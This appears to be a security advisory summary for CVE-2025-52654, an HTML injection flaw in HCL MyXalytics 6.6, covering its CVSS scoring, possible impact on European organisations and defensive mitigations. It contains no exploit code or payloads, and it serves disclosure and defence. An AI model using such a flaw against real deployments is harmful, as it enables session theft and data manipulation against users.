CVE-2025-52654 is a medium-severity vulnerability identified in HCL MyXalytics version 6.6. The vulnerability is classified under CWE-80, which corresponds to Cross-Site Scripting (XSS) or HTML Injection issues. Specifically, this vulnerability allows an attacker to inject arbitrary HTML content into the application. The CVSS v3.1 base score is 4.6, reflecting a medium impact level. The vector string (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N) indicates that the attack can be performed remotely over the network (AV:N) with low attack complexity (AC:L), but requires the attacker to have some privileges (PR:L) and user interaction (UI:R). The scope remains unchanged (S:U), and the impact affects confidentiality and integrity to a limited extent (C:L/I:L) but does not affect availability (A:N). The vulnerability arises from improper sanitization or validation of user-supplied input that is rendered as HTML content, enabling an attacker to inject malicious scripts or HTML elements. This can lead to unauthorized disclosure of information, session hijacking, or manipulation of displayed content, potentially misleading users or compromising data integrity. No known exploits are currently reported in the wild, and no patches have been published yet. The vulnerability was reserved in June 2025 and published in October 2025, indicating recent discovery and disclosure. Given the nature of MyXalytics as an analytics platform, the injection could be leveraged to target users interacting with dashboards or reports, potentially impacting business intelligence data confidentiality and trustworthiness.

For European organizations using HCL MyXalytics 6.6, this vulnerability poses a risk to the confidentiality and integrity of analytics data and user sessions. Attackers exploiting this HTML Injection could execute malicious scripts in the context of legitimate users, potentially stealing sensitive information such as authentication tokens or business intelligence data. This could lead to unauthorized data access or manipulation, undermining decision-making processes. Although availability is not directly impacted, the reputational damage from data integrity issues or information leakage could be significant. Sectors relying heavily on analytics for operational or strategic decisions, such as finance, manufacturing, and government agencies, may face increased risk. Additionally, compliance with GDPR and other data protection regulations could be jeopardized if personal or sensitive data is exposed or manipulated through this vulnerability.

To mitigate this vulnerability, organizations should implement strict input validation and output encoding on all user-supplied data rendered in HCL MyXalytics interfaces. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Limit user privileges to the minimum necessary to reduce the impact of potential exploitation, as the vulnerability requires low privileges but not full administrative access. Monitor user interactions and logs for unusual activities that may indicate attempted exploitation. Since no official patch is currently available, consider applying temporary workarounds such as disabling or restricting features that accept user-generated content or HTML input. Engage with HCL support to obtain updates on patch availability and apply them promptly once released. Additionally, conduct security awareness training for users to recognize and avoid interacting with suspicious content that could trigger exploitation.